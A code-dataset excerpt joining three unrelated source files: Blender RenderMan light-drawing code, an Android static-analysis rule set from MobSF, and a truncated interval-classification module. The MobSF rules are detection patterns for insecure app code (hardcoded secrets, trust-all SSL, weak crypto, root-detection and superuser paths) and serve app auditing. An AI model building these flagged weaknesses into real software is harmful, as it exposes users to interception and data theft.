m = Matrix(ob.matrix_world)
cylinder = []
for pt in s_cylinderLight['vtx']:
cylinder.append( m @ Vector(pt))
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": cylinder}, indices=s_cylinderLight['indices'])
batch.draw(_SHADER_)
def draw_arc(a, b, numSteps, quadrant, xOffset, yOffset, pts):
stepAngle = float(_PI0_5_ / numSteps)
for i in range(0, numSteps):
angle = stepAngle*i + quadrant*_PI0_5_
x = a * math.cos(angle)
y = b * math.sin(angle)
pts.append(Vector([x+xOffset, y+yOffset, 0.0]))
#pts.append(Vector([x+xOffset, 0.0, y+yOffset]))
def draw_rounded_rectangles( left, right,
top, bottom,
radius,
leftEdge, rightEdge,
topEdge, bottomEdge,
zOffset1, zOffset2,
m):
pts = []
a = radius+rightEdge
b = radius+topEdge
draw_arc(a, b, 10, 0, right, top, pts)
a = radius+leftEdge
b = radius+topEdge
draw_arc(a, b, 10, 1, -left, top, pts)
a = radius+leftEdge
b = radius+bottomEdge
draw_arc(a, b, 10, 2, -left, -bottom, pts)
a = radius+rightEdge
b = radius+bottomEdge
draw_arc(a, b, 10, 3, right, -bottom, pts)
translate = m #Matrix.Translation( Vector([0,0, zOffset1])) @ m
shape_pts = []
for pt in pts:
shape_pts.append( translate @ Vector(pt))
shape_pts_indices = _get_indices(shape_pts)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices)
batch.draw(_SHADER_)
shape_pts = []
translate = m #Matrix.Translation( Vector([0,0, zOffset2])) @ m
for pt in pts:
shape_pts.append( translate @ Vector(pt) )
shape_pts_indices = _get_indices(shape_pts)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices)
batch.draw(_SHADER_)
def draw_rod(leftEdge, rightEdge, topEdge, bottomEdge,
frontEdge, backEdge, scale, width, radius,
left, right, top, bottom, front, back, world_mat):
leftEdge *= scale
rightEdge *= scale
topEdge *= scale
backEdge *= scale
frontEdge *= scale
bottomEdge *= scale
m = world_mat
# front and back
draw_rounded_rectangles(left, right, top, bottom, radius,
leftEdge, rightEdge,
topEdge, bottomEdge, front, -back, m)
m = world_mat @ Matrix.Rotation(math.radians(-90.0), 4, 'X')
# top and bottom
draw_rounded_rectangles(left, right, back, front, radius,
leftEdge, rightEdge,
backEdge, frontEdge, top, -bottom, m)
m = world_mat @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
# left and right
draw_rounded_rectangles(front, back, top, bottom, radius,
frontEdge, backEdge,
topEdge, bottomEdge, -left, right, m)
def draw_rod_light_filter(ob):
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
light = ob.data
rm = light.renderman.get_light_node()
edge = rm.edge
width = rm.width
depth = rm.depth
height = rm.height
radius = rm.radius
left_edge = edge
right_edge = edge
top_edge = edge
bottom_edge = edge
front_edge = edge
back_edge = edge
left = 0.0
right = 0.0
top = 0.0
bottom = 0.0
front = 0.0
back = 0.0
scale_width = 1.0
scale_height = 1.0
scale_depth = 1.0
rod_scale = 0.0
if light.renderman.get_light_node_name() == 'PxrRodLightFilter':
left_edge *= rm.leftEdge
right_edge *= rm.rightEdge
top_edge *= rm.topEdge
bottom_edge *= rm.bottomEdge
front_edge *= rm.frontEdge
back_edge *= rm.backEdge
scale_width *= rm.scaleWidth
scale_height *= rm.scaleHeight
scale_depth *= rm.scaleDepth
left = rm.left
right = rm.right
top = rm.top
bottom = rm.bottom
front = rm.front
back = rm.back
left += scale_width * width
right += scale_width * width
top += scale_height * height
bottom += scale_height * height
front += scale_depth * depth
back += scale_depth * depth
draw_rod(left_edge, right_edge,
top_edge, bottom_edge,
front_edge, back_edge, rod_scale,
width, radius,
left, right, top, bottom, front,
back, m)
if edge > 0.0:
# draw outside box
rod_scale = 1.0
draw_rod(left_edge, right_edge,
top_edge, bottom_edge,
front_edge, back_edge, rod_scale,
width, radius,
left, right, top, bottom, front,
back, m)
def draw_ramp_light_filter(ob):
_SHADER_.bind()
set_selection_color(ob)
light = ob.data
rm = light.renderman.get_light_node()
rampType = int(rm.rampType)
begin = float(rm.beginDist)
end = float(rm.endDist)
# distToLight
if rampType in (0,2):
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
# begin
begin_m = m @ Matrix.Scale(begin, 4)
disk = []
for pt in s_diskLight:
disk.append( begin_m @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
# end
end_m = m @ Matrix.Scale(end, 4)
disk = []
for pt in s_diskLight:
disk.append( end_m @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
# linear
elif rampType == 1:
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
box = []
for pt in s_rmanLightLogo['box']:
box.append( m @ Vector(pt))
n = mathutils.geometry.normal(box)
n.normalize()
box1 = []
for i,pt in enumerate(box):
if begin > 0.0:
box1.append(pt + (begin * n))
else:
box1.append(pt)
box_indices = _get_indices(s_rmanLightLogo['box'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box1}, indices=box_indices)
batch.draw(_SHADER_)
box2 = []
for pt in box:
box2.append( pt + (end * n) )
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box2}, indices=box_indices)
batch.draw(_SHADER_)
# radial
elif rampType == 3:
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
if begin > 0.0:
m1 = m @ Matrix.Scale(begin, 4)
disk = []
for pt in s_diskLight:
disk.append( m1 @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = m @ Matrix.Scale(end, 4)
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
else:
pass
def draw_barn_light_filter(ob):
global _BARN_LIGHT_DRAW_HELPER_
_SHADER_.bind()
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
set_selection_color(ob)
if not _BARN_LIGHT_DRAW_HELPER_:
_BARN_LIGHT_DRAW_HELPER_ = BarnLightFilterDrawHelper()
_BARN_LIGHT_DRAW_HELPER_.update_input_params(ob)
vtx_buffer = _BARN_LIGHT_DRAW_HELPER_.vtx_buffer()
pts = []
for pt in vtx_buffer:
pts.append( m @ Vector(pt))
indices = _BARN_LIGHT_DRAW_HELPER_.idx_buffer(len(pt), 0, 0)
# blender wants a list of lists
indices = [indices[i:i+2] for i in range(0, len(indices), 2)]
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": pts}, indices=indices)
batch.draw(_SHADER_)
def draw():
if bpy.context.engine != 'PRMAN_RENDER':
return
scene = bpy.context.scene
for ob in [x for x in scene.objects if x.type == 'LIGHT']:
if ob.hide_get():
continue
if not ob.data.renderman:
continue
rm = ob.data.renderman
if not rm.use_renderman_node:
continue
light_shader = rm.get_light_node()
if not light_shader:
continue
# check the local view for this light
if not ob.visible_in_viewport_get(bpy.context.space_data):
continue
light_shader_name = rm.get_light_node_name()
if light_shader_name == '':
return
if light_shader_name in RMAN_AREA_LIGHT_TYPES:
if ob.data.type != 'AREA':
if hasattr(ob.data, 'size'):
ob.data.size = 0.0
ob.data.type = 'AREA'
elif ob.data.type != 'POINT':
if hasattr(ob.data, 'size'):
ob.data.size = 0.0
ob.data.type = 'POINT'
if light_shader_name == 'PxrSphereLight':
draw_sphere_light(ob)
elif light_shader_name == 'PxrEnvDayLight':
draw_envday_light(ob)
elif light_shader_name == 'PxrDiskLight':
draw_disk_light(ob)
elif light_shader_name == 'PxrDistantLight':
draw_dist_light(ob)
elif light_shader_name == 'PxrPortalLight':
draw_portal_light(ob)
elif light_shader_name == 'PxrDomeLight':
draw_dome_light(ob)
elif light_shader_name == 'PxrCylinderLight':
draw_cylinder_light(ob)
elif light_shader_name in ['PxrGoboLightFilter', 'PxrCookieLightFilter', 'PxrRectLight']:
draw_rect_light(ob)
elif light_shader_name in ['PxrRodLightFilter', 'PxrBlockerLightFilter']:
draw_rod_light_filter(ob)
elif light_shader_name == 'PxrRampLightFilter':
draw_ramp_light_filter(ob)
elif light_shader_name == 'PxrBarnLightFilter':
# get all lights that the barn is attached to
draw_barn_light_filter(ob)
else:
draw_sphere_light(ob)
def register():
global _DRAW_HANDLER_
_DRAW_HANDLER_ = bpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW')
def unregister():
global _DRAW_HANDLER_
if _DRAW_HANDLER_:
bpy.types.SpaceView3D.draw_handler_remove(_DRAW_HANDLER_, 'WINDOW')
| mit | 8,597,294,281,433,653,000 | 30.923304 | 186 | 0.543777 | false |
ajinabraham/Mobile-Security-Framework-MobSF | StaticAnalyzer/views/android/android_rules.py | 1 | 19226 | """
Rule Format
1. desc - Description of the findings
2. type
a. string
b. regex
3. match
a. single_regex - if re.findall(regex1, input)
b .regex_and - if re.findall(regex1, input) and re.findall(regex2, input)
c. regex_or - if re.findall(regex1, input) or re.findall(regex2, input)
d. regex_and_perm - if re.findall(regex, input) and (permission in permission_list_from_manifest)
e. single_string - if string1 in input
f. string_and - if (string1 in input) and (string2 in input)
g. string_or - if (string1 in input) or (string2 in input)
h. string_and_or - if (string1 in input) and ((string_or1 in input) or (string_or2 in input))
i. string_or_and - if (string1 in input) or ((string_and1 in input) and (string_and2 in input))
j. string_and_perm - if (string1 in input) and (permission in permission_list_from_manifest)
k. string_or_and_perm - if ((string1 in input) or (string2 in input)) and (permission in permission_list_from_manifest)
4. level
a. high
b. warning
c. info
d. good
5. input_case
a. upper
b. lower
c. exact
6. others
a. string<no> - string1, string2, string3, string_or1, string_and1
b. regex<no> - regex1, regex2, regex3
c. perm - Permission
"""
RULES = [
{
'desc': 'Files may contain hardcoded sensitive informations like usernames, passwords, keys etc.',
'type': 'regex',
'regex1': r'''(password\s*=\s*['|"].+['|"]\s{0,5})|(pass\s*=\s*['|"].+['|"]\s{0,5})|(username\s*=\s*['|"].+['|"]\s{0,5})|(secret\s*=\s*['|"].+['|"]\s{0,5})|(key\s*=\s*['|"].+['|"]\s{0,5})''',
'level': 'high',
'match': 'single_regex',
'input_case': 'lower',
'cvss': 7.4,
'cwe': 'CWE-312'
},
{
'desc': 'IP Address disclosure',
'type': 'regex',
'regex1': r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
'level': 'warning',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-200'
},
{
'desc': 'Hidden elements in view can be used to hide data from user. But this data can be leaked',
'type': 'regex',
'regex1': r'setVisibility\(View\.GONE\)|setVisibility\(View\.INVISIBLE\)',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-919'
},
{
'desc': 'The App uses ECB mode in Cryptographic encryption algorithm. ECB mode is known to be weak as it results in the same ciphertext for identical blocks of plaintext.',
'type': 'regex',
'regex1': r'Cipher\.getInstance\(\s*"\s*AES\/ECB',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-327'
},
{
'desc': 'This App uses RSA Crypto without OAEP padding. The purpose of the padding scheme is to prevent a number of attacks on RSA that only work when the encryption is performed without padding.',
'type': 'regex',
'regex1': r'cipher\.getinstance\(\s*"rsa/.+/nopadding',
'level': 'high',
'match': 'single_regex',
'input_case': 'lower',
'cvss': 5.9,
'cwe': 'CWE-780'
},
{
'desc': 'Insecure Implementation of SSL. Trusting all the certificates or accepting self signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks',
'type': 'regex',
'regex1': r'javax\.net\.ssl',
'regex2': r'TrustAllSSLSocket-Factory|AllTrustSSLSocketFactory|NonValidatingSSLSocketFactory|net\.SSLCertificateSocketFactory|ALLOW_ALL_HOSTNAME_VERIFIER|\.setDefaultHostnameVerifier\(|NullHostnameVerifier\(',
'level': 'high',
'match': 'regex_and',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-295'
},
{
'desc': 'WebView load files from external storage. Files in external storage can be modified by any application.',
'type': 'regex',
'regex1': r'\.loadUrl\(.*getExternalStorageDirectory\(',
'regex2': r'webkit\.WebView',
'level': 'high',
'match': 'regex_and',
'input_case': 'exact',
'cvss': 5.0,
'cwe': 'CWE-919'
},
{
'desc': 'The file is World Readable. Any App can read from the file',
'type': 'regex',
'regex1': r'MODE_WORLD_READABLE|Context\.MODE_WORLD_READABLE',
'regex2': r'openFileOutput\(\s*".+"\s*,\s*1\s*\)',
'level': 'high',
'match': 'regex_or',
'input_case': 'exact',
'cvss': 4.0,
'cwe': 'CWE-276'
},
{
'desc': 'The file is World Writable. Any App can write to the file',
'type': 'regex',
'regex1': r'MODE_WORLD_WRITABLE|Context\.MODE_WORLD_WRITABLE',
'regex2': r'openFileOutput\(\s*".+"\s*,\s*2\s*\)',
'level': 'high',
'match': 'regex_or',
'input_case': 'exact',
'cvss': 6.0,
'cwe': 'CWE-276'
},
{
'desc': 'The file is World Readable and Writable. Any App can read/write to the file',
'type': 'regex',
'regex1': r'openFileOutput\(\s*".+"\s*,\s*3\s*\)',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 6.0,
'cwe': 'CWE-276'
},
{
'desc': 'Weak Hash algorithm used',
'type': 'regex',
'regex1': r'getInstance(\"md4\")|getInstance(\"rc2\")|getInstance(\"rc4\")|getInstance(\"RC4\")|getInstance(\"RC2\")|getInstance(\"MD4\")',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-327'
},
{
'desc': 'MD5 is a weak hash known to have hash collisions.',
'type': 'regex',
'regex1': r'MessageDigest\.getInstance\(\"*MD5\"*\)|MessageDigest\.getInstance\(\"*md5\"*\)|DigestUtils\.md5\(',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-327'
},
{
'desc': 'SHA-1 is a weak hash known to have hash collisions.',
'type': 'regex',
'regex1': r'MessageDigest\.getInstance\(\"*SHA-1\"*\)|MessageDigest\.getInstance\(\"*sha-1\"*\)|DigestUtils\.sha\(',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-327'
},
{
'desc': 'App can write to App Directory. Sensitive Information should be encrypted.',
'type': 'regex',
'regex1': r'MODE_PRIVATE|Context\.MODE_PRIVATE',
'level': 'info',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 3.9,
'cwe': 'CWE-276'
},
{
'desc': 'The App uses an insecure Random Number Generator.',
'type': 'regex',
'regex1': r'java\.util\.Random',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.5,
'cwe': 'CWE-330'
},
{
'desc': 'The App logs information. Sensitive information should never be logged.',
'type': 'regex',
'regex1': r'Log\.(v|d|i|w|e|f|s)|System\.out\.print|System\.err\.print',
'level': 'info',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.5,
'cwe': 'CWE-532'
},
{
'desc': 'This App uses Java Hash Code. It\'s a weak hash function and should never be used in Secure Crypto Implementation.',
'type': 'string',
'string1': '.hashCode()',
'level': 'high',
'match': 'single_string',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-327'
},
{
'desc': 'These activities prevent screenshot when they go to background.',
'type': 'string',
'string1': 'LayoutParams.FLAG_SECURE',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses SQL Cipher. But the secret may be hardcoded.',
'type': 'string',
'string1': 'SQLiteOpenHelper.getWritableDatabase(',
'level': 'warning',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This app has capabilities to prevent tapjacking attacks.',
'type': 'string',
'string1': 'setFilterTouchesWhenObscured(true)',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'App can read/write to External Storage. Any App can read data written to External Storage.',
'perm': 'android.permission.WRITE_EXTERNAL_STORAGE',
'type': 'string',
'string1': '.getExternalStorage',
'string2': '.getExternalFilesDir(',
'level': 'high',
'match': 'string_or_and_perm',
'input_case': 'exact',
'cvss': 5.5,
'cwe': 'CWE-276'
},
{
'desc': 'App creates temp file. Sensitive information should never be written into a temp file.',
'perm': 'android.permission.WRITE_EXTERNAL_STORAGE',
'type': 'string',
'string1': '.createTempFile(',
'level': 'high',
'match': 'string_and_perm',
'input_case': 'exact',
'cvss': 5.5,
'cwe': 'CWE-276'
},
{
'desc': 'Insecure WebView Implementation. Execution of user controlled code in WebView is a critical Security Hole.',
'type': 'string',
'string1': 'setJavaScriptEnabled(true)',
'string2': '.addJavascriptInterface(',
'level': 'warning',
'match': 'string_and',
'input_case': 'exact',
'cvss': 8.8,
'cwe': 'CWE-749'
},
{
'desc': 'This App uses SQL Cipher. SQLCipher provides 256-bit AES encryption to sqlite database files.',
'type': 'string',
'string1': 'SQLiteDatabase.loadLibs(',
'string2': 'net.sqlcipher.',
'level': 'info',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App download files using Android Download Manager',
'type': 'string',
'string1': 'android.app.DownloadManager',
'string2': 'getSystemService(DOWNLOAD_SERVICE)',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App use Realm Database with encryption.',
'type': 'string',
'string1': 'io.realm.Realm',
'string2': '.encryptionKey(',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'The App may use weak IVs like "0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00" or "0x01,0x02,0x03,0x04,0x05,0x06,0x07". Not using a random IV makes the resulting ciphertext much more predictable and susceptible to a dictionary attack.',
'type': 'string',
'string1': '0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00',
'string2': '0x01,0x02,0x03,0x04,0x05,0x06,0x07',
'level': 'high',
'match': 'string_or',
'input_case': 'exact',
'cvss': 9.8,
'cwe': 'CWE-329'
},
{
'desc': 'Remote WebView debugging is enabled.',
'type': 'string',
'string1': '.setWebContentsDebuggingEnabled(true)',
'string2': 'WebView',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 5.4,
'cwe': 'CWE-919'
},
{
'desc': 'This app listens to Clipboard changes. Some malwares also listen to Clipboard changes.',
'type': 'string',
'string1': 'content.ClipboardManager',
'string2': 'OnPrimaryClipChangedListener',
'level': 'warning',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App copies data to clipboard. Sensitive data should not be copied to clipboard as other applications can access it.',
'type': 'string',
'string1': 'content.ClipboardManager',
'string2': 'setPrimaryClip(',
'level': 'info',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'Insecure WebView Implementation. WebView ignores SSL Certificate errors and accept any SSL Certificate. This application is vulnerable to MITM attacks',
'type': 'string',
'string1': 'onReceivedSslError(WebView',
'string2': '.proceed();',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-295'
},
{
'desc': 'App uses SQLite Database and execute raw SQL query. Untrusted user input in raw SQL queries can cause SQL Injection. Also sensitive information should be encrypted and written to the database.',
'type': 'string',
'string1': 'android.database.sqlite',
'string_or1': 'rawQuery(',
'string_or2': 'execSQL(',
'level': 'high',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-89'
},
{
'desc': 'This App detects frida server.',
'type': 'string',
'string1': 'fridaserver',
'string_or1': '27047',
'string_or2': 'REJECT',
'string_or3': 'LIBFRIDA',
'level': 'good',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses an SSL Pinning Library (org.thoughtcrime.ssl.pinning) to prevent MITM attacks in secure communication channel.',
'type': 'string',
'string1': 'org.thoughtcrime.ssl.pinning',
'string_or1': 'PinningHelper.getPinnedHttpsURLConnection',
'string_or2': 'PinningHelper.getPinnedHttpClient',
'string_or3': 'PinningSSLSocketFactory(',
'level': 'good',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App has capabilities to prevent against Screenshots from Recent Task History/ Now On Tap etc.',
'type': 'string',
'string1': '.FLAG_SECURE',
'string_or1': 'getWindow().setFlags(',
'string_or2': 'getWindow().addFlags(',
'level': 'high',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Debug Detection code to detect wheather an App is debuggable or not is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isDebuggable',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Debugger Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isDebuggerConnected',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Emulator Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'EmulatorDetector.isRunningInEmulator',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DecGuard code to detect wheather the App is signed with a debug key or not is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isSignedWithDebugKey',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Root Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'RootDetector.isDeviceRooted',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard App Tamper Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'TamperDetector.checkApk',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Signer Certificate Tamper Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'TCertificateChecker.checkCertificate',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'The App may use package signature for tamper detection.',
'type': 'string',
'string1': 'PackageManager.GET_SIGNATURES',
'string2': 'getPackageName(',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses SafetyNet API.',
'type': 'string',
'string1': 'com.google.android.gms.safetynet.SafetyNetApi',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App may request root (Super User) privileges.',
'type': 'string',
'string1': 'com.noshufou.android.su',
'string2': 'com.thirdparty.superuser',
'string3': 'eu.chainfire.supersu',
'string4': 'com.koushikdutta.superuser',
'string5': 'eu.chainfire.',
'level': 'high',
'match': 'string_or',
'input_case': 'exact',
'cvss': 0,
'cwe': 'CWE-250'
},
{
'desc': 'This App may have root detection capabilities.',
'type': 'string',
'string1': '.contains("test-keys")',
'string2': '/system/app/Superuser.apk',
'string3': 'isDeviceRooted()',
'string4': '/system/bin/failsafe/su',
'string5': '/system/sd/xbin/su',
'string6': '"/system/xbin/which", "su"',
"string7": 'RootTools.isAccessGiven()',
'level': 'good',
'match': 'string_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
}]
| gpl-3.0 | 4,659,156,025,997,647,000 | 33.277064 | 246 | 0.512379 | false |
vene/ambra | ambra/classifiers.py | 1 | 6082 | import numpy as np
from sklearn.base import BaseEstimator
from sklearn.linear_model import LogisticRegression, Ridge
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.validation import check_random_state
from pairwise import pairwise_transform, flip_pairs
def _nearest_sorted(scores, to_find, k=10):
position = np.searchsorted(scores, to_find)
width = k / 2
offset = k % 2
if position < width:
return slice(None, k)
elif position > len(scores) - width - offset:
return slice(-k, None)
else:
return slice(position - width, position + width + offset)
def _interval_dist(a, b):
a_lo, a_hi = a
b_lo, b_hi = b
if b_lo >= a_lo and b_hi <= a_hi: # b contained in a
return 0.0
else:
return np.abs(0.5 * (b_lo + b_hi - a_lo - a_hi))
class DummyIntervalClassifier(BaseEstimator):
"""Dummy predictor that chooses one of the possible intervals.
Possible target intervals have to be passed along with each training
instance. Can be used as a simple baseline for sanity-checking.
Parameters
----------
method: {"center" (default)|"random"},
If "center", always predicts the middle interval from the list given.
If "random", an interval is uniformly picked.
random_state: None (default) int or np.random object,
Seed for the random number generator. Only used if `method="random"`.
"""
def __init__(self, method="center", random_state=None):
self.method = method
self.random_state = random_state
def fit(self, X, Y):
pass
def _predict_interval(self, possible_intervals, rng=None):
if self.method == "center":
return possible_intervals[len(possible_intervals) / 2]
elif self.method == "random":
if rng is None:
rng = check_random_state(self.random_state)
return possible_intervals[rng.randint(len(possible_intervals))]
def predict(self, X, Y_possible):
if self.method == "random":
rng = check_random_state(self.random_state)
else:
rng = None
return [self._predict_interval(possible_intervals, rng)
for possible_intervals in Y_possible]
class IntervalRidge(Ridge):
def predict(self, X, Y_possible):
predicted_years = super(IntervalRidge, self).predict(X)
predicted_intervals = np.array([self.get_interval(possible_intervals, predicted_year)
for possible_intervals, predicted_year in zip(Y_possible, predicted_years)])
return predicted_intervals
def fit(self, X, Y):
Y_regression = np.array([np.mean(y) for y in Y])
return super(IntervalRidge, self).fit(X, Y_regression)
def get_interval(self, intervals, year):
year = int(year)
# if the year is not included in any of the intervals,
# it is situated either to the left or to the right of the possible intervals
if year < intervals[0][0]:
return intervals[0]
elif year > intervals[-1][1]:
return intervals[-1]
else:
# TODO: can be implemented with np.searchsorted
for interval in intervals:
if interval[0] <= year <= interval[1]:
return interval
class IntervalLogisticRegression(LogisticRegression):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
random_state=None, solver='liblinear', max_iter=100,
multi_class='ovr', verbose=0, n_neighbors=5, limit_pairs=1.0):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = False
self.intercept_scaling = 1
self.class_weight = None
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.n_neighbors = n_neighbors
self.limit_pairs = limit_pairs
self.loss = 'lr' # required for sklearn 0.15.2
def fit(self, X, y):
rng = check_random_state(self.random_state)
X_pw = pairwise_transform(X, y, limit=self.limit_pairs,
random_state=rng)
X_pw, y_pw = flip_pairs(X_pw, random_state=rng)
self.n_pairs_ = len(y_pw)
super(IntervalLogisticRegression, self).fit(X_pw, y_pw)
train_scores = safe_sparse_dot(X, self.coef_.ravel())
order = np.argsort(train_scores)
self.train_intervals_ = y[order]
self.train_scores_ = train_scores[order]
return self
def score(self, X, y):
print("pairwise accuracy is used")
X_pw = pairwise_transform(X, y)
X_pw, y_pw = flip_pairs(X_pw, random_state=0) # not fair
return super(IntervalLogisticRegression, self).score(X_pw, y_pw)
def _predict_interval(self, score, possible_intervals):
interval_scores = [sum(_interval_dist(cand, nearest)
for nearest
in self.train_intervals_[
_nearest_sorted(self.train_scores_,
score, k=self.n_neighbors)])
for cand in possible_intervals]
return possible_intervals[np.argmin(interval_scores)]
def predict(self, X, Y_possible):
pred_scores = safe_sparse_dot(X, self.coef_.ravel())
return [self._predict_interval(score, possible_intervals)
for score, possible_intervals
